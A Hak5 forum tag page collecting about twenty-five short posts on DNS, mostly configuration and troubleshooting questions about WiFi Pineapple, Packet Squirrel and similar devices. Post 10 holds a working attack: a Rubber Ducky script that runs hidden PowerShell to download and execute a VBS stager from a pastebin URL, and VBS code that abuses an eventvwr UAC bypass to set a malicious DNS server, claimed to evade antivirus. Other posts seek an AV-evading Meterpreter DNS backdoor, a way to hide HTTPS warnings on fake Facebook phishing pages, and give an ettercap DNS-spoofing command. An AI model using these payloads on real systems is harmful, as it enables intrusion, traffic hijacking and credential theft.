Jump to content

Search the Community

Showing results for tags 'dns'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I'm trying to test a few things with a self hosted C2 and a Tetra on the same LAN. since it want setup to work both internal and external via a host name, I setup an a record on my internal DNS so that the external DNS name will resolve to the internal IP while on the same LAN. This issue is getting the Tetra to look to my DNS server automatically. I'm currently using eth0 (wired) for my network connection. What I would like is for the Tetra to get its DNS information from the same DHCP server that is handing out it IP address. I have tried removing the "Option DNS 8.8.8.8, 8.8.4.4" from /etc/config/network under bot WAN (eth0) and WWAN with no luck. I know that I can edit the /etc/resolve.conf file (currently pointed to 127.0.01) or add a static entry to /etc/hosts (which I have done to get things working internally for now), but I'm looking for a means to do this via the DHCP issues DNS servers so that it will revolved the host name both internally and externally based on the network that it is connected to. Any suggestions?
  2. I'm relatively new to owning a wifi pineapple nano and I need help, I can get people connected to the pineapples fake ap but now I want to rickroll them. I think I need to be using the DNS spoofing module but I'm not sure how. Please help :)
  3. Hello everyone, Today I have been playing with the SpoofDNS feature of the Packet Squirrel (payload 2). I noticed the following: > Redirection of spoofed URL works fine > Internet works fine > Internal resources by DNS name are not accessible (but can be pinged) This almost never causes problems on a private PC but might cause problems on a company network. The user is able to access the internet but can no longer access internal websites. For example, we host a ticket system on the network (tickets.company.nl) which, for example, was no longer accessible. All other internet DNS queries where resolved ok. SpoofDNS is standard on NAT network mode. This is fine. The client thus receives an IP address from the Packet Squirrel. The client first performs a DNS lookup at the Packet Squirrel and the Packet Squirrel routes it to the Spoofed IP if the requested DNS name is on the spoof list. If the name does not appear on the spoof list, I assume that the Packet Squirrel routes the client traffic through the company's DNS server. But I do not think that is the case because the internal resources are no longer available. Which DNS server does the Packet Squirrel use? And is there a fix so that internal resources can be reached. I have already tried to change the network mode to BRIDGE. Then internal resources can be reached again but logically the spoofing does not work because the client make the DNS request at the company DNS server and not at the Packet Squirrel anymore. I am very curious how this works. Hopefully you can help me? Thank you! Sincerely, Jarno
  4. Hi i have a wierd problem where my wifi pinapple looks like it's connected to the internett but it don't get dns lookup so it don't work. It works on my android device with cable and the pinapple app, this is wierd but dns lookups when bridging trough my new install of ubuntu 16.04 LTS with all updates installed and dnsmasq disabled My wifi pinapple can ping the internet eks: 8.8.8.8 #WIFI pinapple ##Ping root@pie:~# ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: seq=0 ttl=55 time=18.029 ms ##NSLOOKUP root@pie:~# nslookup vg.no Server: 127.0.0.1 Address 1: 127.0.0.1 localhost (No respons) ##NSLOOKUP with different dns server defined root@pie:~# nslookup vg.no 8.8.8.8 Server: 8.8.8.8 (No respons) ## WGET test to adobe.com (IP 192.150.16.117) root@pie:~# wget 192.150.16.117 --no-check-certificate --2017-04-26 19:45:11-- http://192.150.16.117/ Connecting to 192.150.16.117:80... connected. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://192.150.16.117:6081/php/urladmin.php?vsys=1&cat=16383&title=unknown&rulename=Internet Access&sip=10.3.100.3&post=0&token=913AB4C748D6DE9FFDA3664A4FB58B279D2A2B9C&url=http://192.150.16.117%2f [following] --2017-04-26 19:45:11-- https://192.150.16.117:6081/php/urladmin.php?vsys=1&cat=16383&title=unknown&rulename=Internet Access&sip=10.3.100.3&post=0&token=913AB4C748D6DE9FFDA3664A4FB58B279D2A2B9C&url=http://192.150.16.117%2f Connecting to 192.150.16.117:6081... connected. WARNING: certificate common name 'sd1-pa-01.int.honeysec.com' doesn't match requested host name '192.150.16.117'. HTTP request sent, awaiting response... 200 OK Length: 3030 (3.0K) [text/html] Saving to: 'index.html' index.html 100%[===================>] 2.96K --.-KB/s in 0s 2017-04-26 19:45:12 (23.0 MB/s) - 'index.html' saved [3030/3030] ## ifconfig root@pie:~# ifconfig br-lan Link encap:Ethernet HWaddr 00:C0:CA:8F:9A:CC inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2147 errors:0 dropped:0 overruns:0 frame:0 TX packets:2035 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:371610 (362.9 KiB) TX bytes:846393 (826.5 KiB) eth0 Link encap:Ethernet HWaddr 00:C0:CA:8F:9A:CC UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2155 errors:0 dropped:0 overruns:0 frame:0 TX packets:2044 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:402148 (392.7 KiB) TX bytes:846807 (826.9 KiB) Interrupt:4 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:193 errors:0 dropped:0 overruns:0 frame:0 TX packets:193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:12840 (12.5 KiB) TX bytes:12840 (12.5 KiB) wlan0 Link encap:Ethernet HWaddr 00:C0:CA:8F:69:4A UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:1566 (1.5 KiB) wlan1 Link encap:Ethernet HWaddr 00:C0:CA:8F:84:37 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan2 Link encap:Ethernet HWaddr 00:19:86:51:80:16 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) ## Route root@pie:~# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 172.16.42.42 0.0.0.0 UG 0 0 0 br-lan 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan ## IP-Tables root@pie:~# sudo iptables -L -ash: sudo: not found root@pie:~# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination delegate_input all -- anywhere anywhere Chain FORWARD (policy ACCEPT) target prot opt source destination delegate_forward all -- anywhere anywhere Chain OUTPUT (policy ACCEPT) target prot opt source destination delegate_output all -- anywhere anywhere Chain delegate_forward (1 references) target prot opt source destination forwarding_rule all -- anywhere anywhere /* user chain for forwarding */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED zone_lan_forward all -- anywhere anywhere zone_usb_forward all -- anywhere anywhere Chain delegate_input (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere input_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED syn_flood tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN zone_lan_input all -- anywhere anywhere zone_usb_input all -- anywhere anywhere Chain delegate_output (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere output_rule all -- anywhere anywhere /* user chain for output */ ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED zone_lan_output all -- anywhere anywhere zone_usb_output all -- anywhere anywhere Chain forwarding_lan_rule (1 references) target prot opt source destination Chain forwarding_rule (1 references) target prot opt source destination Chain forwarding_usb_rule (1 references) target prot opt source destination Chain forwarding_wan_rule (1 references) target prot opt source destination Chain input_lan_rule (1 references) target prot opt source destination Chain input_rule (1 references) target prot opt source destination Chain input_usb_rule (1 references) target prot opt source destination Chain input_wan_rule (1 references) target prot opt source destination Chain output_lan_rule (1 references) target prot opt source destination Chain output_rule (1 references) target prot opt source destination Chain output_usb_rule (1 references) target prot opt source destination Chain output_wan_rule (1 references) target prot opt source destination Chain reject (0 references) target prot opt source destination REJECT tcp -- anywhere anywhere reject-with tcp-reset REJECT all -- anywhere anywhere reject-with icmp-port-unreachable Chain syn_flood (1 references) target prot opt source destination RETURN tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 25/sec burst 50 DROP all -- anywhere anywhere Chain zone_lan_dest_ACCEPT (6 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_lan_forward (1 references) target prot opt source destination forwarding_lan_rule all -- anywhere anywhere /* user chain for forwarding */ zone_wan_dest_ACCEPT all -- anywhere anywhere /* forwarding lan -> wan */ zone_usb_dest_ACCEPT all -- anywhere anywhere /* forwarding lan -> usb */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_lan_dest_ACCEPT all -- anywhere anywhere Chain zone_lan_input (1 references) target prot opt source destination input_lan_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_lan_src_ACCEPT all -- anywhere anywhere Chain zone_lan_output (1 references) target prot opt source destination output_lan_rule all -- anywhere anywhere /* user chain for output */ zone_lan_dest_ACCEPT all -- anywhere anywhere Chain zone_lan_src_ACCEPT (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_usb_dest_ACCEPT (3 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_usb_forward (1 references) target prot opt source destination forwarding_usb_rule all -- anywhere anywhere /* user chain for forwarding */ zone_lan_dest_ACCEPT all -- anywhere anywhere /* forwarding usb -> lan */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_usb_dest_ACCEPT all -- anywhere anywhere Chain zone_usb_input (1 references) target prot opt source destination input_usb_rule all -- anywhere anywhere /* user chain for input */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_usb_src_ACCEPT all -- anywhere anywhere Chain zone_usb_output (1 references) target prot opt source destination output_usb_rule all -- anywhere anywhere /* user chain for output */ zone_usb_dest_ACCEPT all -- anywhere anywhere Chain zone_usb_src_ACCEPT (1 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain zone_wan_dest_ACCEPT (3 references) target prot opt source destination Chain zone_wan_forward (0 references) target prot opt source destination forwarding_wan_rule all -- anywhere anywhere /* user chain for forwarding */ zone_lan_dest_ACCEPT esp -- anywhere anywhere /* @rule[7] */ zone_lan_dest_ACCEPT udp -- anywhere anywhere udp dpt:isakmp /* @rule[8] */ zone_lan_dest_ACCEPT all -- anywhere anywhere /* forwarding wan -> lan */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port forwards */ zone_wan_dest_ACCEPT all -- anywhere anywhere Chain zone_wan_input (0 references) target prot opt source destination input_wan_rule all -- anywhere anywhere /* user chain for input */ ACCEPT udp -- anywhere anywhere udp dpt:bootpc /* Allow-DHCP-Renew */ ACCEPT icmp -- anywhere anywhere icmp echo-request /* Allow-Ping */ ACCEPT igmp -- anywhere anywhere /* Allow-IGMP */ ACCEPT all -- anywhere anywhere ctstate DNAT /* Accept port redirections */ zone_wan_src_ACCEPT all -- anywhere anywhere Chain zone_wan_output (0 references) target prot opt source destination output_wan_rule all -- anywhere anywhere /* user chain for output */ zone_wan_dest_ACCEPT all -- anywhere anywhere Chain zone_wan_src_ACCEPT (1 references) target prot opt source destination # Now over to the host (ubuntu 16.04 box) computer ## Verifying that dnsmasq is disabled (tested with dnsmasq also same problem) master@Castle:~$ more /etc/NetworkManager/NetworkManager.conf [main] plugins=ifupdown,keyfile,ofono #dns=dnsmasq [ifupdown] managed=false ## DNS server used by host master@Castle:~$ more /etc/resolv.conf # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) # DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN nameserver 10.3.3.1 search (redacted) ## verifying that DNS works master@Castle:~$ nslookup adobe.com Server: 10.3.3.1 Address: 10.3.3.1#53 Non-authoritative answer: Name: adobe.com Address: 192.150.16.117 ## ifconfig on the ubuntu host root@Castle:/home/master# ifconfig eth0 Link encap:Ethernet HWaddr 00:c0:ca:8f:b3:ea inet addr:172.16.42.42 Bcast:172.16.42.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2771 errors:0 dropped:0 overruns:0 frame:0 TX packets:2897 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:961043 (961.0 KB) TX bytes:580359 (580.3 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:700 errors:0 dropped:0 overruns:0 frame:0 TX packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:53380 (53.3 KB) TX bytes:53380 (53.3 KB) wlan0 Link encap:Ethernet HWaddr 44:1c:a8:e1:88:5b inet addr:10.3.100.3 Bcast:10.3.100.255 Mask:255.255.255.0 inet6 addr: fe80::abec:d514:8472:1ac3/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:21566 errors:0 dropped:0 overruns:0 frame:0 TX packets:16288 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:23408735 (23.4 MB) TX bytes:1627835 (1.6 MB) ## iptables on the ubuntu host root@Castle:/home/master# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination ACCEPT all -- 172.16.42.0/24 anywhere state NEW ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED Chain OUTPUT (policy ACCEPT) target prot opt source destination ## Routes on the host root@Castle:/home/master# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.3.100.1 0.0.0.0 UG 0 0 0 wlan0 10.3.100.0 * 255.255.255.0 U 600 0 0 wlan0 link-local * 255.255.0.0 U 1000 0 0 wlan0 172.16.42.0 * 255.255.255.0 U 0 0 0 eth0 I have bashed my head all day at this problem and i am not a step closer to a solution. Please someone help figure this out. I can't be the onlyone with this problem.
  5. Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer
  6. Here is the file - https://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=dns-remoteshell.pcap And a screenshot - http://i64.tinypic.com/6gwu2v.jpg I have to analyse this file and answer several questions about it, like, small description of the events and weather this shows an attack, but I'm new to Wireshark so I'm a bit lost. If anyone could have a look and get back to me that would be great!
  7. Hello I have set up my Nano to share my wlan0 internet on Kali. I followed all the instructions including running the latest wp6.sh script. The Nano can ping IP addresses but can not resolve URL's. i.e you can ping 216.58.203.110 but not google.com. I am thinking just change the DNS server on the NANO but how do you do this? Should be easy but not proving so. Help appreciated. Mike
  8. Hello, please excuse my noobishery, but I have been searching around on how to set the DNS server a client is provided when they connect to the Wifi Pineapple Nano. Any kind of help or redirect would be greatly appreciated.
  9. Hello I have a problem. I have 3 questions about modules 1. How do I add my my own rolls to the random roll module and how do I add my own images for css of the pineapple interface ? 2 What is the difference between DNSSpoof and DNSMasq Spoof ? 3. How to use both dnsspoof and dnsmasqspoof ? Thanks in advance
  10. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  11. Hi I'm experimenting with Ettercap to perform MiTM attacks, and DNS-spoof. My setup exists out of two laptops. Laptop A running Kali Linux 2.0 and is the 'attacker' machine (IP: 192.168.0.131), and Laptop B running Windows 7 as 'victim' (IP: 192.168.0.150). I'm encountering a few problems when I try this, first of all, the command 'route' doesn't find my actual default gateway. It says the default is '192.168.0.0', but Ettercap and the Windows machine say it is '192.168.0.1' which is the correct one. But that ain't he biggest problem, the biggest problem is, that my DNS-spoof attack is working when performing it using the Ettercap-GUI. But as soon as I try to do it by using the terminal it fails; it doesn't even intercept the requests made from the victim. My command: ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof //192.168.0.1//192.168.0.150// What is wrong with this command, because the attack works in graphical mode there is something wrong with the command, not with my network setup. I also made a video showing the problem: https://sendvid.com/8o8p2ssz like you can see there it is working graphical, but not from terminal using the command. And than my second question Can someone point me in the right direction/tutorial on how to use this attack with SSLstrip? This to perform a downgrade attack to also be able to DNS-spoof SSL-protected (HTTPS) websites. Of course I have searched myself, but none tutorial or video found showing it with Ettercap etc. Thanks!
  12. I recently got a WiFi PineApple and managed to setup a working openvpn connection. My issue is when i go to http://dnsleaktest.com what is shown as my resolver is my default's internet connection when on the VPN connection I use google's DNS resolvers 8.8.8.8 and 8.8.4.4.With this known I can not seem to create a up script that will allow me to get the right DNS servers to be shown and used. I know this is not just a openvpn/openwrt issue so there must be some way to write a script that will force the use of the passed DNS servers from openvpn. I noticed the "issue" is also with my Ubuntu system that I'm using. with the Ubuntu system I know how to fix that issue but not with the WiFi PineApple
  13. Sometime when you need to map networks, for example when you gain access to a LAN server without security tools on it, it can be useful to retrieve reverses dns for a specified internal PI. You can do it directly in bash with this short command line (example for 192.168.1.0/24) : seq 1 254 |xargs -I{} -n 1 host 192.168.1.{} It also works fine on a public PI of course. Don't hesitate to share your tips too :) -- Christophe Casalegno https://twitter.com/Brain0verride
  14. Hello, I have just received my Tetra. I have it mostly set up except for DNS. I need to change the default DNS from whatever it is set at to my routers address (Port 53 is blocked unless it's my router) If I change /etc/resolv.conf to add my nameserver will that mess any modules up and will it mess up my Tetra?
  15. I searched and researched but I'm not 100% sure of what I'm looking for. So my Clients are my iphone and Chromebook. When I check out my wifi info I get the router (nano) info which is the usual: IP - 172.16.42.* Subnet - 255.255.255.0 router - 172.16.42.1 DNS - 172.16.42.1 search domains - lan What do I need to do to change these from showing their current information? Also, I've played around with the Kernel IP routing table under the Networking menu and all it ever seems to do is erase the top default row which is usually the wifi wlan2 is connected to. What else can I do with the Default Route input? Thank you. EDIT: There is this thread but i'm looking to keep my wlan0-1/brlan ip of 172.16.42.1:1471 and give out a different IP block to the clients on wlan0
  16. So here are the facts i am working with kali sana trying to spoof dns with ethercap 1.internal network 2.I can spoof dns ===> when pinging facebook.com from victim machine i get my internal IP (192.168.1.6) 3.but when i try to browse with edge, chrome to facebook.com it says no connection 4.when i spoof a different url i get the index page of the server of the attacker 5.tried to spoof dns on xp and on windows 10 same results how can i solve this problem and what is the cause Thank you in advance
  17. Hi, Lanturtle works fine. Static IP was set, same settings as the direct LAN port on PC (DHCP addresses go through proxy....) Strange thing is, when LAN cable is directly connected I can ping. When LAN cable is attached to the Lanturtle, I can't ping. But I have network, (I can Google, I have connection to SSHFS folder, etc......) Also external DNS's are resolved, internals not. Any ideas?
  18. Hello , I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work . What I use in Veil : - I use python/shellcode_inject/base64_substitution - For payload windows/meterpreter/reverse_tcp_dns Veil asks me 2 times for a lhost . What I use in Metasploit : - multi/handler - payload is windows/meterpreter/reverse_tcp_dns - lhost is my local ip - lport is my port It works witout a dns. Please help .
  19. I just become my Pineapple. I've installed it, connected it via LAN to Notebook. The Notebook was connected over WLAN to Internet. I'm using Windows. Sharing of WLAN Adapter is enabled. LAN Connection (to Pineapple) configured: 172.16.42.42, Subnet: 255.255.255.0, Default Gateway: none, DNS 8.8.8.8 Connection form Notebook to Pineapple works fine. Connection from Smartphone to Pineapple works fine. But no DNS was resolved. Ping (via Putty) to www.google.com was not working. Ping to 173.194.67.104 (IP of google.com) was working. With Smartphone: when I go to www.google.com -> Site was not resolved. When I type 173.194.67.104 in browser: google.com was showing. Route: Destination Gateway Genmask Flags Metric Ref Use Iface default 172.16.42.42 0.0.0.0 UG 0 0 0 br-lan 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan What do I making wrong?
  20. Hey guys, I work in IT support and enjoy tinkering with things like Kali Linux, Raspberry PI, ect... My wife recently started seeing some vulger ads on normal websites like CNN, Local News, and others. I started seeing similar things on my laptop very soon after. I did tthe normal checking for malware and things. I eventually checked the router settings nd found the DNS servers were set to static IPs instead of DHCP from he ISP. I chaged it back to auto, abd the vulger ads and things stoped. I checked the logs to see what happened but all the logs were deleted. After the reboot the logs were showing a DOS attack blocked. I think this was something like a man in the middle attack or something simlar. I'd like to know how they were able to get into my router and change the DNS servers and delete the logs. I've alredy did the basics post-attack steps like change passwords and things. Thanks guys!
  21. hiii i have make some fake pages for known pages like Facebook etc i have also install dnsmasq in Kali and setup Apache server and every thing is okay now when the victim visit Facebook in chrome for example it will told him that this is unsecured cuz of https is there any way or tools in Kali to avoid that or any other thing would be greet thanks :)
  22. Hey everyone. I have a pretty random question today. Is it possible for you to have a website, that's fully functional, and publically accessible, without a domain name attached to it? So let's say you have a dedicated web server running apache or iis, it has a publically facing IP address, and the router it's behind can pass port 80 traffic to it, no problem. If people knew the IP address for this host, can they access the website and bypass a domain name, and therefore bypass any sort of DNS resolution? I know you can get to a website by using it's IP address, but I'm wondering if it would work without ANY domain name attached to it. This address would not be listed in the local DNS records right? Is this possible? Thanks guys!
  23. Why don't we use the innate ability of dnsmasq to spoof hosts instead of dnsspoof? I noticed that the pineapple would reply to my queries twice when using dnsspoof (instead of once as I expected). After some research http://blog.philippheckel.com/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ I noticed that is it 1. entirely possible thus moving away from the hit and miss of dnsspoof and 2. would make it much neater. Should we look into creating an infusion maybe? Wishing you all well, Cristian
  24. Dear Hak5 Community, Whilst playing around with the Wifi Pineapple MK5 -> dnsspoof and I noticed that whilst I would receive the spoofed reply, dnsmasq would also send the correct record. I then started investigating dnsmasq and I noticed that it is possible to use it in order to spoof hosts directly. The problem I have with dnsspoof is that sometimes the browser would get the correct reply thus making this module less useful. When using dnsmasq the success rate is 100%. Do any of you know why we are not dropping dnsspoof and use dnsmasq instead? I have a proof of concept infusion, but before I work on it any more I would like to know if anyone could foresee any issues with using dnsmasq instead of dnsspoof. Kind regards, Cristian
  25. Hello everyone, I have create a very simple html which is the only page i want my clients to see. Like a captive portal but not intrested in giving them internet connection. I am having problems with nodogsplash which does not redirect any traffic when my pineapple is not connected to the internet. I know i can use "Evil Portal" but i am trying to make this manual. I also noticed that nodogsplash is at 0.9_beta9.9.9 but opkg brings 0.9_beta9.9.6 (not only pineapple, openwrt too) Does the pineapple have to be connected to the internet for nodogsplash to work? Is there a way to replicate the iptables rules nodogsplash creates? Is there any good alternative "captive portal manager" you can suggest? My nodogsplash.conf My /etc/config/dhcp Running: nodogsplash -d 7 -f and it stays like this even when clients connect. As an alternative i tried dnsspoof and iptables (one at a time and both together) My spooofhost.conf dnsspoof -i br-lan -f spoofhost.conf iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 172.16.42.1 and iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1 In this case it redirects traffic to 172.16.42.1 but if pineapple is not connected to the internet Android and iPhone Devices cannot betect the "captive portal" and pop the pseudo browser.
×
×
  • Create New...